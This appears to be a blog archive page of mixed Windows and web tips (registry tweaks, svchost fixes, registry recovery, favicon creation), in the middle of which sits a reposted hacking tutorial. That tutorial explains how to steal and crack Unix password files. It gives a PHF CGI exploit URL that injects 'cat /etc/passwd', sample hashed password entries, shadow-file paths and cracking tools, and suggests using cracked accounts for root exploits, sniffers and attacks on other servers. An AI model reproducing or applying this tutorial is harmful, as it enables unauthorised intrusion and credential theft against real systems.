Items filtered by date: December 2014

XGA         1024 x 768
WXGA        1280 x 800
WXGA+       1440 x 900
SXGA        1280 x 1024
SXGA+       1400 x 1050
WSXGA       1280 x 854
WSXGA+      1680 x 1050
UXGA        1600 x 1200
WUXGA       1920 x 1200

My Hi-Def Screen

Glossy screen for a Dell Latitude D800

Toshiba LTD154EZ0D

Non-Glossy

Samsung LTN154U1-L01

Non Glossy

If you are on a Windows Platform, create an import.reg file with the following code in it (where .phps is replaced with the extension of file you would like to search inside, such as .cfm .php or .xml). Multiple ones can be added by making copies of the registry key and replacing the extension.

{code class="brush: powershell"}Windows Registry Editor Version 5.00 [HKEY_CLASSES_ROOT\.phps\PersistentHandler] @="{5e941d80-bf96-11cd-b579-08002b30bfeb}"{/code}

1. Save file
2. Import in to Registry
3. Reboot

Now windows searches inside those files for you.

Not checked on Vista.

Outlook doesn't have a View, Source option like you'll find in Outlook Express. It has View, Options which shows you the Internet header in a small text box. But it only includes the Internet header, not the full message source.

Using Outlook 2003 you can view the header and source together, if you edit a registry key. This works on mail obtained from Internet mail transports, not Exchange server mailboxes. However, if you access the mailbox using an Internet transport, you'll see the full source.

Open the registry editor and navigate to:

HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Options\Mail 

right click on the right pane and choose new DWORD:

Parameter: SaveAllMIMENotJustHeaders
Value: 1

Note: This works only on new mail received after you create the registry key. You won't be able to see the source on messages already downloaded.

Introduction

Passwd files are the easist and simplist ways to hack. This text will explain what they are, how to get them, how to crack them, what tools you will need, and whatyoucan do with them. Of course the minute you sign on the account you just happened to crack because of this file, you are breaking the law. This text is for information, not illegal activites. If you choose to doillegal activies with the information from this it is no one's fault but your own. Now down to the good stuff.

What is a Passwd File

A passwd file is an encrypted file that contains the users on aservers passwords. The key word here is encrypted, so don't start thinking all i have to do is find one and i hit the jackpot. Nope sorry Man, theres alot more to it than that. The passwd file should look somethinglikethis

root:x:0:1:0000-Admin(0000):/:/bin/ksh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
listen:x:37:4:NetworkAdmin:/usr/net/nls:nobody:x:60001:60001:uid
nobody:/:noaccess:x:60002:60002:uid noaccess:/:
ftp:x:101:4:
FTPUser:/export/home/ftp:
rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rrc

Out of that entire section the only name you could use would be

rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rcc 

Here is how you read the File

rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rcc
Username: rcc
Encrypted Password: uXDg04UkZgWOQ
User number: 201
Group Number:4
Real Name (usually): Richard Clark
Home Directory: /export/home/rrc
Type of Shell: /bin/ksh 

Because it is the only name with an encrypted password. You will never find a passwd file that has a passwd for anything like ftp, listen, bin, etc., etc. Occasionally using the PHF exploit or unshadowing a passwd file you can get an encrypted password for root.

PHF Exploit

First let me explain what an exploit is. An Exploit is a hole in software that allows someone to get something out of it that... Well you aren't supposed to.

The PHF exploit is a hole in CGI, that most servers have fixed now (if they have CGI). Lets just say a very popular IRC place has a problem with their CGI. Also on the subject of servers with the exploit open, many forien servers have this open. Unlike the FTP Passwd you don't even have to access their FTP or login. What you do is get a WWW browser and then in the plass for the WWW address type:

http://www.target.com/cgi-bin/phf?Qalias=j00%ffcat%20/etc/passwd

In www.target.com Place who's passwd you want to get. If you get a message like ""The requested object does not exist on this server. The link you followed is either outdated, inaccurate, or the server has been instructed not to let you have it."" its not there. If you get ""You have been caught on Candid Camera!"" They caught you, but don't fear they rarly ever Report you. I have yet to find a server that does report. Of course if you get

root:JPfsdh1NAjIUw:0:0:Special admin sign in:/:/bin/csh
sysadm:ufcNtKNYj7m9I:0:0:
Regular Admin login:/admin:/sbin/sh
bin:*:2:2:Admin :/bin:
sys:*:3:3:Admin :/usr/src:
adm:*:4:4:Admin :/usr/adm:/sbin/sh
daemon:*:1:1: Daemon Login for daemons needing
nobody:*:65534:65534::/:
ftp:*:39:39:FTP guest login:/var/ftp:
dtodd:yYn1sav8tKzOI:101:100:John Todd:/home/dtodd:/sbin/sh
joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh

You have hit the jackpot [=. Save the file as a text and keep it handy, because you will need it for later in the lesson.

FTP Passwd

The Passwd file on some systems is kept on FTP, which can pretty much be accessed by anyone, unless the FTP has a non-anonymous logins rule.

If you are desprite to get a passwd file from a certain server (which may not even be open, so only do if you are desprite or you want to hack your own server) get an account that allows you access to their FTP.

What you do is get an FTP client such as WS FTP or CuteFTP. Find the servers name and connect to it. You should get a list of Directories like ""etc, hidden, incoming, pub"" goto the one called etc. inside etc should be a few files like ""group, passwd"" if any chance you see one called shadow there is a 8/10 chance you are about to deal with a shadowed passwd.

Well get the passwd file and maybe check out what else is on the server so it won't look so suspious. Anyway when you log out, run and check out your new passwd file. If you only see names like ""root, daemon, FTP, nobody, ftplogin,bin"" with * beside their names where the encrypted passwd should be, you got a passwd file that you cannot crack. But if it happens to have user names (like rcc:*: or ggills:*:"" with a * (or another symbol) you have a shadowed passwd. Of course if you have been reading and paying attention if you have something that has a few things that look like:

joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh

You have gotten one you can crack.

Shadowed Passwd's

Now if you happen to find a passwd file that looks something like this:

joetest:*:102:100::/home/joetest:/usr/bin/restsh

which has a user name, not a programs, you have a shadowed passwd.

The shadow file has the encrypted passwords on it. Depending on the Operating System, the passwd file may be in different places. To find out what Operating system your target is running from telnet (connected to that server ofcourse) type uname -a and it should say, if you cannot get to telnet there is other methods of finding out.

Here is a guide to systems passwd file locations (taken from a text on passwd files by Kryto.) A token is the * (or other symbol) beside a shadowed passwds user name

UNIX Paths (Courtesy of 2600)

UNIX Path Token

AIX 3/etc/security/passwd !
or /tcb/auth/files/ 
A/UX 3.0s /tcb/files/auth/?/ * 
BSD4.3-Reno /etc/master.passwd * 
ConvexOS 10 /etc/shadpw * 
ConvexOS 11 /etc/shadow * 
DG/UX /etc/tcb/aa/user/ * 
EP/IX /etc/shadow 
x HP-UX /.secure/etc/passwd * 
IRIX 5 /etc/shadow 
x Linux 1.1 /etc/shadow * 
OSF/1 /etc/passwd[.dir|.pag] * 
SCO Unix #.2.x /tcb/auth/files/ / * 
SunOS4.1+c2 /etc/security/passwd.adjunct ##username 
SunOS 5.0 /etc/shadow 
System V Release 4.0 /etc/shadow 
x System V Release 4.2 /etc/security/* 
database Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS /etc/udb * 

Anyway once you have the passwd file (with user names) and shadow file you can find a unshadowing program which combines the passwd file and the shadow passwd and combines them into what a regualr passwd file would be.

A unshadowing program can be found at http://www.hackersclub.com/km/downloads/password_cracker/ucfjohn2.zip

Now some servers have the shadow file on retrictions so no one without a special account on the server can get to it.

Crackers

Now that you have gotten a passwd file, what the hell do you do it it to get passwords from it? Thats where crackers come in.

A cracker takes the passwd file and a wordlist and compares the wordlist to the passwd files encrypted passwd. I have used many different crackers. Everyone has their favorite. My personal favorite is one called PaceCrack95 Ver. 1.1 http://tms.netrom.com/~cassidy/utils/pacec.zip

Many people swear that John the Ripper is the greatest but i have problems with it, but it can be gotten off any decent hacking page. Same for Cracker Jack. A Cracker will load a wordlist and a passwd file and compare the two. When it cracks a password it will tell you the user name and the unencrypted password. You don't need to write it down because the program auto saves it. Cracker Jack saves the file as jack.pot and i think John the Ripper does too. PaceCrack95 Ver. 1.1 saves it to the files name (ex., passwd.txt.db) with the exact name and makes it a .DB file. I like to keep a passwd file once i have cracked it and later try out a new passwd cracker on it with the same wordlist and see if it works or if it is fake. It helps.

Wordlists

Wordlists are a nessicity to cracking passwd files. They are just huge lists of words. The biggest wordlist is avaliable from here, ftp://ftp.ox.ac.uk/pub/wordlists/

If you get a passwd file from another contry get a wordlist with the same launguage as the worlist came from, as the users would probably use words they are familier with.

There are some programs which can make random numbers to what you specify but that might not be really great, since there is such a huge amount of number combinations they could use. I am not completly saying they are useless since i have cracked a password with one before, I had fashioned my own list of 4 digit numbers since people might use their phone number and well it worked.

What to do with a Cracked Passwd file

What you can do with a passwd is up to you. The nice thing to do is inform the administator of the server that, accounts on his (or her) server are insucure and possibly open to anyone hacking an account and bringing havok upon their server. Some other things you can do is fire up good ole telnet and connect to one of their ports and see what you could do with that account. The possiblities are endless. You could hack a webpage (i wouldn't do that on account of how lame it is to destruct someones piece of work.)

You could use an exploit in sendmail and get root or install a sniffer on the system and get all the passwords you could ever want from it. You could use the account to do work on OTHER servers that you sure as hell wouldn't want to do from your own. If your account is canceled you can use a hacked accounts dial up till you purchase a new one. Like I said the list goes on and on. I am sure noone wants you doing anything destuctive (its lame anyhow.) And the best thing to do is report the problem to the system admin so, if he finds out he won't freak and call your admin and tell him you have been doing naughty things or even call the cops. I hope this text was informative enough to fufill your needs.

The PC is running very slow and the CPU is maxing out running a process called svchost.exe

computers stall at Windows startup (and other occasions, such as when loading IE) for minutes at a time, Mouse-clicks stack up and run all of a sudden.

Because svchost is a generic container for lots of windows services there are lots of causes of 100% CPU usage and and as many solutions.

Work throught the list below as appropiate and apply and changes where appropiate:

Unprinted document in 'Microsoft Image Printer'

open the Image printer print queue and delete any print jobs in there, if you do not use this printer, delete it to prevent any further occurance of this error.

Microsoft Update

Disabled 'Microsoft Update' (automated local sevice) via system properties and use 'Windows Update' (web based update service). This is a permenant fix which will allow normal operation to carry out the fix below.

• Windows Update is exactly what it says in the name - the site for updating Windows.
• Microsoft Update is an optional "upgrade" to Windows Update which contains all that is in Windows Update, but also includes other updates for Microsoft programs such as Office.
• Automatic Updates is the service that runs locally and checks periodically for critical updates for Windows.

1) Update to WUAgent v3

It may say "Install is not needed since Windows Update Agent is already installed." If so, then run the exe with the command line switch /wuforce

2) Run MS KB927891

3) Reboot

4) If still experiencing high CPU, run Office Update by itself from the Office support site. Install as requested, including any ActiveX.

5) Update and Reboot as necessary.

Microsoft article, (also inculdes links to other versions of V3 installer. ie 64 bit), forum 1, forum 2

Utilities

To view the list of services that are running in Svchost run the folowing in the command prompt:

Tasklist /SVC

Tasklist displays a list of active processes. The /SVC switch shows the list of active services in each process. For more information about a process, type the following command, and then press ENTER:

Tasklist /FI "PID eq processID" (with the quotation marks) 

Microsoft Article

In working with many Windows XP computers over the past couple of years in my shop, I've run across a few systems with corrupted registry files. Most of the time, I will get an error similar to the following:

Windows could not start because the following file is missing or corrupt:
\WINDOWS\SYSTEM32\CONFIG\SYSTEM
\WINDOWS\SYSTEM32\CONFIG\SOFTWARE

Other times I won't get an error and the system will just reboot continuously without a blue screen error message. One thing is for certain in all of these problems: I can't boot into safe mode to fix it!!!!

It is cases like this when we want to manually roll back the registry. Basically, this restores your system's registry files to a point where they might have actually been stable, or at least less destructive than they are now. This process is not the same as system restore, mainly because we're only replacing the registry files, where system restore also replaces other system files.

If you Turned Off System Restore, turn around and go back where you came from. There is no hope for you.

One of Windows XP's "features" is something called System Restore. I don't like to use it for reasons I do not plan to go into, but what is good news for you and me is that System Restore takes a daily snapshot of your Registry files.

The registry snapshots are kept in the System Volume Information directory, typically in the root of the C: drive. The files are difficult to access normally, even in the Recovery Console, because the NTFS security settings on these files do not allow any user except for SYSTEM access to the files. Microsoft's way of doing what I am explaining now, which is linked at the bottom of this page, explains to restore the original registry files from %Windir%\Repair\ first, then changing the security and blah blah blah eventually getting the right files in. What a crockashit... My way is much easier.

STEP 1 -> Boot your system with WinPE

In order to move these registry files around, we need full, unrestricted access to the NTFS filesystem. This can be done several ways, but the easiest and most efficient way is to use something called the Windows XP PreInstallation Environment, WinPE for short. If you are a Microsoft OEM you likely have a real Microsoft WinPE CD lying around, but if not you can build your own WinPE. I highly recommend building the PE yourself, as it is a most valuable tool as a technician. If you do not care to do this, skip everything else I'm going to say and go do it the Microsoft way.. blah.

STEP 2 -> Find a recent Restore Point Registry Snapshot

So at this point, you've fully booted into the WinPE environment and have a cmd.exe prompt open. First off, navigate to the C:\System Volume Information\ directory. Windows XP has a great thing called tab completion Type "cd \sys" and then press the tab key. Voila! press enter.

From here, do a "dir" and see what you have... You may see one or two weird directories that have Microsoft CLSID identifiers. Within one of these directories we're looking for "Restore Points" which will be directories identified by "RPxx" where xx is a number. Type "cd _restore{CDSFSD"+tab or whatever the name of the directory is and do another 'dir'. If you see nothing, "cd .." and then go into the other one.

Now you've made it into the directory with all the restore points. Congratulations! Since they're not in any order, type "dir /od" to sort them by date. Look closely at the timestamp of these directories. Your goal here is to restore the system to a point where it was working and not about to crash. You also do not want to go back so far that it affects your settings or programs that you've installed, programs you've activated, etc. I try to keep the restore over two days but within a week of when the system crashed. Let's say it's 6pm on Thursday, look for midday Tuesday or beforehand, but not much more than that. Once you have found one that you're satisfied with, change to that directory, and beneath it, change to the "snapshot" directory. Do a directory listing. This is what your registry was at that point. Chances are it isn't corrupted, and your system might boot with it!

STEP 3 -> Overwrite your corrupt registry with the snapshot

All we have to do now is get these registry files to overwrite your current registry files. Great. Wait, Backup, you say? Why? They're corrupted. Why backup a corrupted file?

Using the benefits of Tab Completion, type the following commands:

copy _REGISTRY_MACHINE_SAM \windows\system32\config\SAM
copy _REGISTRY_MACHINE_SECURITY \windows\system32\config\SECURITY
copy _REGISTRY_MACHINE_SOFTWARE \windows\system32\config\SOFTWARE
copy _REGISTRY_MACHINE_SYSTEM \windows\system32\config\SYSTEM
copy _REGISTRY_USER_.DEFAULT \windows\system32\config\DEFAULT

Done.

There is also a copy of the registry in C:\windows\repair, you could try these if you have turned system restore off. This method can be used in the recovery console see this article from microsoft

If it didn't fix, Try a repair installation or scanning your hard drive for viruses outside of your computer or in WinPE.

IMPORTANT NOTE: Tekmaven brings up a valid point -- Those that join a domain with Media Center 2005 will *not* be able to use extender devices due to the Fast User Switching dependency (who uses extenders anyway?)

UPDATE (January 8th): I have received news the Linksys MCE Extender device works fine when joined in a domain.

1. Insert Windows XP CD.

2. Start > Run > X:\i386\winnt32.exe /cmdcons

   (replace X: with the appropiate drive letter)

3. Acknowledge prompt by clicking 'Yes'.

4. Skip updating process by clicking 'Cancel' or by pressing 'Esc'

5. After installation, acknowledge success msg. by clicking 'Ok'

6. Start > Shutdown > Restart

7. At boot menu, select 'Microsoft Windows Recovery Console'

8. Select proper installation to log onto (default: 1) and press 'Enter'

   (If prompted, enter Administrator password and press 'Enter')

9. Type (without quotes) and press enter: 'cd system32\config'

10. Type (without quotes) and press enter: 'copy SYSTEM C:\'

11. Type (without quotes) and press enter: exit

12. At boot menu, select 'Windows XP Media Center Edition'

13. Log into Windows and play a game of minesweeper (very important)

14. Start > Run > Type: 'regedit' and press enter

15. Click on 'HKEY_LOCAL_MACHINE'.

16. File > Load Hive...

17. Browse and select C:\SYSTEM

18. Specify key name 'BANANA' and click OK

19. Expand: HKEY_LOCAL_MACHINE > BANANA > WPA > MedCtrUpg

20. On the right-hand side, double-click IsLegacyMCE value

21. Change selected value to 1 and click Ok. (THAT IS NOT AN L!)

22. Click on BANANA subkey (under HKEY_LOCAL_MACHINE).

23. File > Unload Hive. Confirm.

24. Start > Shutdown > Restart

25. At boot menu, select 'Microsoft Windows Recovery Console'

26. Take sip of Dr. Pepper (very important)

27. Select proper installation to log onto (default: 1) and press 'Enter'

   (If prompted, enter Administrator password and press 'Enter')

28. Type (without quotes) and press enter: 'cd \'

29. Type (without quotes) and press enter: 'copy SYSTEM C:\WINDOWS\SYSTEM32\CONFIG\SYSTEM'

  (Yes, you want to overwrite - Go ahead and do it)

30. Type (without quotes) and press enter: 'del SYSTEM'

31. Type (without quotes) and press enter: 'exit'

32. At boot menu, select 'Windows XP Media Center Edition'

33. Take a piss while you wait.

34. Join domain. What, you were expecting instructions on this too?

Mysteries Of The Favicon.ico — How To Create A Favicon In Photoshop

A Favicon is a little custom icon that appears next to a website's URL in the address bar of a web browser. And when I say little, I mean 16 pixels by 16 pixels. So if you like a good design challenge try your hand at this one.

All you need to add a Favicon to your site is a Windows Icon (.ico) file called favicon.ico that you upload to the main directory of your website.

Download The Plugin

You'll need the Windows Icon (ICO) file format Photoshop Plugin to export to the .ico file format. You can download the plugin from Telegraphics. The plugin reads and writes ICO files in 1, 4 and 8-bit Indexed and 24-bit RGB modes, and also reads and writes 32-bit "XP" icons (with 8-bit alpha channel). Make sure to install the plugin before you begin this tutorial.

Let's Begin

Because 16 x 16 is such a small canvas area, it can be very difficult to be creative. So instead start your project with a canvas set at 64 x 64 (always use even multiples when you plan on resizing files). Do this by selecting File>New, and opening a new canvas that is 64 x 64 pixels in size.

The Design

If you already have a logo you should reduce it to the 16 x 16 size to see if it holds up. If it doesn't look good at this size, work with the 64 x 64 canvas and try creating a simple design that incorporates colors from your website's palette.

When you're ready to test the design select Image>Image Size menu and enter 16 x 16. Click on Resample Image and choose "Bicubic Sharper" from the drop-down menu (CS only for this step). This is the best setting for making sure that an image doesn't blur as it's being resized.

If you feel the icon is not quite what you wanted, just keep tweaking it until it is perfect. At this tiny size it can take a few tries before you get it right.

Saving The Custom Icon

Go to File>Save As and make sure you name the file favicon.ico. Under Format you must choose Windows Icon (ICO) from the pulldown menu. This format will only be available in Photoshop after you download and install the plugin. In the next step you'll need to upload this new file to the root folder of your website, so it's a good idea to navigate and save it to that location on your hard drive now.

Uploading The Favicon.ico File

Connect to your server and upload your Favicon.ico file to your website. You must place it into the same directory as your home (index) page, and leave it loose, making sure not to put it in an images directory or other folder.

Some browsers will look for a direct link in the HTML source code to your site's favicon.ico file. You can help these browsers by adding this link in the head section of each page on which you want the Favicon.ico to appear. Here is the link code to include: <link rel="Shortcut Icon" href="/favicon.ico"> Once you've added this code, upload all of your modified pages

Testing

If your new Favicon does not show up right away, try refreshing the page — or put a '?' at the end of the url, which will trick a browser into thinking the page is new and not cached.

Troubleshooting

• Browser Issues: Microsoft IE 6 for Windows will not display the favicon until the URL has been added to the favorites, and Safari for the MAC will not display an updated favicon until the browser cache has been cleared. But choosing ‘empty cache’ from the menu won't help because Safari stores favicons in a separate cache. You must empty the icon cache yourself. Look for it in User>Library>Safari>Icons.

• File Format Not Available: The Windows Icon (ICO) file format will not be available until you have downloaded and installed the plugin, and then Quit and Restarted Photoshop

Inspiration

If you need some inspiration have a look through this nice collection of favicons. Also look at the nice categorized list of 50 remarkable favicons at Smashing Magazine. You might find something that triggers an idea for your own.

Original Article

Western Digital

"WDCWDCWDCWDCWDCWDCWDCWDCWDCWDCWD"

Seagate

"Seagate + 25 blanks"

In Vista SP1 the default Administrator account is disabled. But enabling it is a simple task.

Enable a command prompt with administrative privileges.

1. Enter "cmd" in the search box under the Start menu and press CTRL + SHIFT + Enter to launch the command prompt with administrative privileges.

or

2. Alternatively, you can also right-click the highlighted result and choose the "Run as administrator" option.

Now run the appropoiate command below.

To enable the account type the command:

net user administrator /active:yes

To disable the account, type the command:

net user administrator /active:no